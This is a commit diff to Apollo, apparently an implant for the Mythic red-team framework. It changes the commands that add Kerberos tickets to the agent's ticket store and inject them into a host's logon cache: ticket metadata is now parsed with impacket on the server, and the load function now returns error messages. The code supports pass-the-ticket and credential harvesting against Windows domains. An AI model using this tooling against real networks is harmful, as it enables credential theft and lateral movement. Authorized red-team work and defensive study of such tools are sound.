updating ticket_*_add commands to use impacket more locally

its-a-feature · its-a-feature · commit e6c44cd1e90c · 2025-03-14T14:06:04.000-05:00
diff --git a/Payload_Type/apollo/CHANGELOG.MD b/Payload_Type/apollo/CHANGELOG.MD
@@ -4,6 +4,13 @@ All notable changes to this project will be documented in this file.
 The format is based on [Keep a Changelog](https://keepachangelog.com/en/1.0.0/),
 and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0.html).
 
+## [v2.3.9] - 2025-03-14
+
+### Changed
+
+- Updated `ticket_store_add` to not create a temp logon session to fetch ticket information
+  - Instead, ticket information is fetched via impacket in the apollo container first and sent down with the task
+  
 ## [v2.3.8] - 2025-03-12
 
 ### Changed
diff --git a/Payload_Type/apollo/Dockerfile b/Payload_Type/apollo/Dockerfile
@@ -12,7 +12,7 @@ RUN curl -L -o donut_shellcode-2.0.0.tar.gz https://github.com/MEhrn00/donut/rel
 
 WORKDIR /Mythic/
 RUN python3 -m venv /venv
-RUN /venv/bin/python -m pip install mythic-container==0.5.22  mslex impacket
+RUN /venv/bin/python -m pip install mythic-container==0.5.26  mslex impacket
 RUN /venv/bin/python -m pip install git+https://github.com/MEhrn00/donut.git@v2.0.0
 
 COPY [".", "."]
diff --git a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/ITicketManager.cs b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/ITicketManager.cs
@@ -22,7 +22,7 @@ public interface ITicketManager
     //should return all tickets in the current LUID or all tickets if running as administrator
     public List<KerberosTicket> EnumerateTicketsInCache(bool getSystemTickets = false, string luid = "");
     //loads a ticket into memory and should be tracked by the agent session
-    public bool LoadTicketIntoCache(byte[] ticket, string luid);
+    public (bool, string) LoadTicketIntoCache(byte[] ticket, string luid);
     //unloads a ticket from memory and should be removed from the agent session
     public bool UnloadTicketFromCache(string serviceName, string domainName, string luid, bool All = false);
 
diff --git a/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTypes.cs b/Payload_Type/apollo/apollo/agent_code/ApolloInterop/Features/KerberosTickets/KerberosTypes.cs
@@ -6,6 +6,7 @@
 using static ApolloInterop.Features.WindowsTypesAndAPIs.WinNTTypes;
 using static ApolloInterop.Features.WindowsTypesAndAPIs.LSATypes;
 using static ApolloInterop.Features.WindowsTypesAndAPIs.APIInteropTypes;
+using System.Runtime.Serialization;
 
 namespace ApolloInterop.Features.KerberosTickets;
 
@@ -27,20 +28,31 @@ public record struct LogonSessionData
 /// <summary>
 /// Record type to represent a Kerberos ticket.
 /// </summary>
+[DataContract]
 public record KerberosTicket
 {
+    [DataMember(Name = "luid")]
     public LUID Luid { get; set; }
     public string LogonId => Luid.ToString();
+    [DataMember(Name = "ClientName")]
     public string ClientName { get; set; }
+    [DataMember(Name = "ClientRealm")]
     public string ClientRealm { get; set; }
     public string ClientFullName => $"{ClientName}@{ClientRealm}";
+    [DataMember(Name = "ServerName")]
     public string ServerName { get; set; }
+    [DataMember(Name = "ServerRealm")]
     public string ServerRealm { get; set; }
     public string ServerFullName => $"{ServerName}@{ServerRealm}";
+    [DataMember(Name = "StartTime")]
     public DateTime StartTime { get; set; }
+    [DataMember(Name = "EndTime")]
     public DateTime EndTime { get; set; }
+    [DataMember(Name = "RenewTime")]
     public DateTime RenewTime { get; set; }
+    [DataMember(Name = "EncryptionType")]
     public KerbEncType EncryptionType { get; set; }
+    [DataMember(Name = "TicketFlags")]
     public KerbTicketFlags TicketFlags { get; set; }
     public byte[] Kirbi { get; set; } = [];
 }
diff --git a/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs b/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosHelpers.cs
@@ -522,7 +522,7 @@ internal static (KerberosTicket?, string) ExtractTicket(LUID targetLuid, string
     }
 
     // load ticket
-    internal static bool LoadTicket(byte[] submittedTicket, LUID targetLuid)
+    internal static (bool, string) LoadTicket(byte[] submittedTicket, LUID targetLuid)
     {
         HANDLE requestAndTicketHandle = new();
         HANDLE lsaHandle = new();
@@ -570,14 +570,14 @@ internal static bool LoadTicket(byte[] submittedTicket, LUID targetLuid)
             if (status != NTSTATUS.STATUS_SUCCESS || returnStatus != NTSTATUS.STATUS_SUCCESS)
             {
                 DebugHelp.DebugWriteLine($"Failed to submit ticket with api status: {status} and return status: {returnStatus}");
-                return false;
+                return (false, $"Failed to submit ticket:\n{returnStatus}");
             }
             DebugHelp.DebugWriteLine("Ticket submitted");
-            return true;
+            return (true, "");
         }
         catch (Exception e)
         {
-            return false;
+            return (false, e.Message);
         }
         finally
         {
diff --git a/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosTicketManager.cs b/Payload_Type/apollo/apollo/agent_code/KerberosTickets/KerberosTicketManager.cs
@@ -38,7 +38,7 @@ public KerberosTicketManager(IAgent agent)
     public (KerberosTicket?, string) ExtractTicketFromCache(string luid, string serviceName) => KerberosHelpers.ExtractTicket(WinNTTypes.LUID.FromString(luid), serviceName);
     public List<KerberosTicket> EnumerateTicketsInCache(bool getSystemTickets = false, string luid = "") => KerberosHelpers.TriageTickets(getSystemTickets,luid).ToList();
     
-    public bool LoadTicketIntoCache(byte[] ticket, string luid) => KerberosHelpers.LoadTicket(ticket, WinNTTypes.LUID.FromString(luid));
+    public (bool, string) LoadTicketIntoCache(byte[] ticket, string luid) => KerberosHelpers.LoadTicket(ticket, WinNTTypes.LUID.FromString(luid));
     
     public bool UnloadTicketFromCache(string serviceName, string domainName, string luid, bool All = false) =>  KerberosHelpers.UnloadTicket(serviceName, domainName, WinNTTypes.LUID.FromString(luid), All);
     
diff --git a/Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_add.cs b/Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_cache_add.cs
@@ -38,13 +38,16 @@ public override void Start()
             string luid = parameters.luid ?? "";
             string base64Ticket = parameters.base64Ticket;
             byte[] ticketBytes = Convert.FromBase64String(base64Ticket);
-            if (_agent.GetTicketManager().LoadTicketIntoCache(ticketBytes, luid))
+            bool success;
+            string errorMsg;
+            (success, errorMsg) = _agent.GetTicketManager().LoadTicketIntoCache(ticketBytes, luid);
+            if (success)
             {
                 resp = CreateTaskResponse($"Injected Ticket into Cache", true);
             }
             else
             {
-                resp = CreateTaskResponse($"Failed to inject ticket into cache", true, "error");
+                resp = CreateTaskResponse($"{errorMsg}", true, "error");
             }
         }
         catch (Exception e)
diff --git a/Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_store_add.cs b/Payload_Type/apollo/apollo/agent_code/Tasks/Features/KerberosTickets/ticket_store_add.cs
@@ -25,6 +25,24 @@ internal struct TicketStoreAddParameters
     {
         [DataMember(Name = "base64ticket")]
         internal string base64Ticket;
+        [DataMember(Name = "ClientName")]
+        public string ClientName;
+        [DataMember(Name = "ClientRealm")]
+        public string ClientRealm;
+        [DataMember(Name = "ServerName")]
+        public string ServerName;
+        [DataMember(Name = "ServerRealm")]
+        public string ServerRealm;
+        [DataMember(Name = "StartTime")]
+        public int StartTime;
+        [DataMember(Name = "EndTime")]
+        public int EndTime;
+        [DataMember(Name = "RenewTime")]
+        public int RenewTime;
+        [DataMember(Name = "EncryptionType")]
+        public int EncryptionType;
+        [DataMember(Name = "TicketFlags")]
+        public int TicketFlags;
     }
 
     public ticket_store_add(IAgent agent, MythicTask data) : base(agent, data)
@@ -37,17 +55,19 @@ public override void Start()
             TicketStoreAddParameters parameters = _jsonSerializer.Deserialize<TicketStoreAddParameters>(_data.Parameters);
             string base64Ticket = parameters.base64Ticket;
             byte[] ticketBytes = Convert.FromBase64String(base64Ticket);
-            //make a placeholder ticket for now
-            KerberosTicket? ticket = _agent.GetTicketManager().GetTicketDetailsFromKirbi(ticketBytes);
-            if(ticket == null)
-            {
-                resp = CreateTaskResponse($"Failed to extract ticket from kirbi or failed to parse new data", true, "error");
-            }
-            else
-            {
-                _agent.GetTicketManager().AddTicketToTicketStore(new KerberosTicketStoreDTO(ticket));
-                resp = CreateTaskResponse($"Added Ticket to Ticket Store", true);
-            }
+            KerberosTicket ticket = new KerberosTicket();
+            ticket.ClientRealm = parameters.ClientRealm;
+            ticket.ClientName = parameters.ClientName;
+            ticket.ServerName = parameters.ServerName;
+            ticket.ServerRealm = parameters.ServerRealm;
+            ticket.StartTime = new DateTime(1970,1,1,0,0,0).AddSeconds(parameters.StartTime);
+            ticket.EndTime = new DateTime(1970,1,1,0,0,0).AddSeconds(parameters.EndTime);
+            ticket.RenewTime = new DateTime(1970,1,1,0,0,0).AddSeconds(parameters.RenewTime);
+            ticket.TicketFlags = (KerbTicketFlags)parameters.TicketFlags;
+            ticket.EncryptionType = (KerbEncType)parameters.EncryptionType;
+            ticket.Kirbi = ticketBytes;
+            _agent.GetTicketManager().AddTicketToTicketStore(new KerberosTicketStoreDTO(ticket));
+            resp = CreateTaskResponse($"Added Ticket to Ticket Store", true);
         }
         catch (Exception e)
         {
diff --git a/Payload_Type/apollo/apollo/mythic/agent_functions/builder.py b/Payload_Type/apollo/apollo/mythic/agent_functions/builder.py
@@ -21,7 +21,7 @@ class Apollo(PayloadType):
     supported_os = [
         SupportedOS.Windows
     ]
-    version = "2.3.8"
+    version = "2.3.9"
     wrapper = False
     wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]
     note = """
diff --git a/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_cache_add.py b/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_cache_add.py
@@ -79,23 +79,25 @@ class ticket_cache_addCommand(CommandBase):
 
     async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreateTaskingMessageResponse:
         response = PTTaskCreateTaskingMessageResponse( TaskID=taskData.Task.ID,Success=True)
-        if taskData.args.get_parameter_group_name() == "Use Existing Ticket":
+        current_group_name = taskData.args.get_parameter_group_name()
+        if current_group_name == "Use Existing Ticket":
             credentialData = taskData.args.get_arg("existingTicket")
             taskData.args.remove_arg("existingTicket")
-            taskData.args.add_arg("base64ticket", credentialData["credential"], parameter_group_info=[ParameterGroupInfo(group_name="Use Existing Ticket")])
-        else:
-            base64Ticket = taskData.args.get_arg("base64ticket")
-            ccache = CCache()
-            ccache.fromKRBCRED(base64.b64decode(base64Ticket))
-            #ccache.credentials[0].__getitem__('client').prettyPrint()  # user@domain
-            #ccache.credentials[0].__getitem__('server').prettyPrint()  # krbtgt/domain@domain
-            #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['starttime']).isoformat()
-            #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['endtime']).isoformat()
-            #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['renew_till']).isoformat()
-            formattedComment = f"Service: {ccache.credentials[0].__getitem__('server').prettyPrint().decode('utf-8')}\n"
-            formattedComment += f"Start: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['starttime']).isoformat()}\n"
-            formattedComment += f"End: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['endtime']).isoformat()}\n"
-            formattedComment += f"Renew: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['renew_till']).isoformat()}\n"
+            taskData.args.add_arg("base64ticket", credentialData["credential"], parameter_group_info=[ParameterGroupInfo(group_name=current_group_name)])
+
+        base64Ticket = taskData.args.get_arg("base64ticket")
+        ccache = CCache()
+        ccache.fromKRBCRED(base64.b64decode(base64Ticket))
+        #ccache.credentials[0].__getitem__('client').prettyPrint()  # user@domain
+        #ccache.credentials[0].__getitem__('server').prettyPrint()  # krbtgt/domain@domain
+        #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['starttime']).isoformat()
+        #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['endtime']).isoformat()
+        #datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['renew_till']).isoformat()
+        formattedComment = f"Service: {ccache.credentials[0].__getitem__('server').prettyPrint().decode('utf-8')}\n"
+        formattedComment += f"Start: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['starttime']).isoformat()}\n"
+        formattedComment += f"End: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['endtime']).isoformat()}\n"
+        formattedComment += f"Renew: {datetime.fromtimestamp(ccache.credentials[0].__getitem__('time')['renew_till']).isoformat()}\n"
+        if current_group_name == "Add New Ticket":
             resp = await SendMythicRPCCredentialCreate(MythicRPCCredentialCreateMessage(
                 TaskID=taskData.Task.ID,
                 Credentials=[
@@ -108,7 +110,8 @@ async def create_go_tasking(self, taskData: PTTaskMessageAllData) -> PTTaskCreat
                     )
                 ]
             ))
-        response.DisplayParams = f"-base64ticket {taskData.args.get_arg('base64ticket')}"
+        response.DisplayParams = f" client: {ccache.credentials[0].__getitem__('client').prettyPrint().decode('utf-8')}"
+        response.DisplayParams += f", service: {ccache.credentials[0].__getitem__('server').prettyPrint().decode('utf-8')}"
         luid = taskData.args.get_arg("luid")
         if luid is not None and luid != "":
             response.DisplayParams += f" -luid {luid}"
diff --git a/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_cache_extract.py b/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_cache_extract.py
@@ -84,10 +84,11 @@ async def parse_credentials(task: PTTaskCompletionFunctionMessage, ) -> PTTaskCo
                     TaskID=task.TaskData.Task.ID,
                     Response=f"\nFailed to add to Mythic's credential store:\n{resp.Error}".encode()
                 ))
-        except:
-            pass
+        except Exception as e:
+            logger.error(e)
     return response
 
+
 class ticket_cache_extractCommand(CommandBase):
     cmd = "ticket_cache_extract"
     needs_admin = False
diff --git a/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_store_add.py b/Payload_Type/apollo/apollo/mythic/agent_functions/ticket_store_add.py

Original file line number	Diff line number	Diff line change
`@@ -522,7 +522,7 @@ internal static (KerberosTicket?, string) ExtractTicket(LUID targetLuid, string`
`522`	`522`	`}`
`523`	`523`
`524`	`524`	`// load ticket`
`525`		`- internal static bool LoadTicket(byte[] submittedTicket, LUID targetLuid)`
	`525`	`+ internal static (bool, string) LoadTicket(byte[] submittedTicket, LUID targetLuid)`
`526`	`526`	`{`
`527`	`527`	`HANDLE requestAndTicketHandle = new();`
`528`	`528`	`HANDLE lsaHandle = new();`
`@@ -570,14 +570,14 @@ internal static bool LoadTicket(byte[] submittedTicket, LUID targetLuid)`
`570`	`570`	`if (status != NTSTATUS.STATUS_SUCCESS \|\| returnStatus != NTSTATUS.STATUS_SUCCESS)`
`571`	`571`	`{`
`572`	`572`	`DebugHelp.DebugWriteLine($"Failed to submit ticket with api status: {status} and return status: {returnStatus}");`
`573`		`- return false;`
	`573`	`+ return (false, $"Failed to submit ticket:\n{returnStatus}");`
`574`	`574`	`}`
`575`	`575`	`DebugHelp.DebugWriteLine("Ticket submitted");`
`576`		`- return true;`
	`576`	`+ return (true, "");`
`577`	`577`	`}`
`578`	`578`	`catch (Exception e)`
`579`	`579`	`{`
`580`		`- return false;`
	`580`	`+ return (false, e.Message);`
`581`	`581`	`}`
`582`	`582`	`finally`
`583`	`583`	`{`
Original file line number	Diff line number	Diff line change
`@@ -38,13 +38,16 @@ public override void Start()`
`38`	`38`	`string luid = parameters.luid ?? "";`
`39`	`39`	`string base64Ticket = parameters.base64Ticket;`
`40`	`40`	`byte[] ticketBytes = Convert.FromBase64String(base64Ticket);`
`41`		`- if (_agent.GetTicketManager().LoadTicketIntoCache(ticketBytes, luid))`
	`41`	`+ bool success;`
	`42`	`+ string errorMsg;`
	`43`	`+ (success, errorMsg) = _agent.GetTicketManager().LoadTicketIntoCache(ticketBytes, luid);`
	`44`	`+ if (success)`
`42`	`45`	`{`
`43`	`46`	`resp = CreateTaskResponse($"Injected Ticket into Cache", true);`
`44`	`47`	`}`
`45`	`48`	`else`
`46`	`49`	`{`
`47`		`- resp = CreateTaskResponse($"Failed to inject ticket into cache", true, "error");`
	`50`	`+ resp = CreateTaskResponse($"{errorMsg}", true, "error");`
`48`	`51`	`}`
`49`	`52`	`}`
`50`	`53`	`catch (Exception e)`
Original file line number	Diff line number	Diff line change
`@@ -21,7 +21,7 @@ class Apollo(PayloadType):`
`21`	`21`	`supported_os = [`
`22`	`22`	`SupportedOS.Windows`
`23`	`23`	`]`
`24`		`- version = "2.3.8"`
	`24`	`+ version = "2.3.9"`
`25`	`25`	`wrapper = False`
`26`	`26`	`wrapped_payloads = ["scarecrow_wrapper", "service_wrapper"]`
`27`	`27`	`note = """`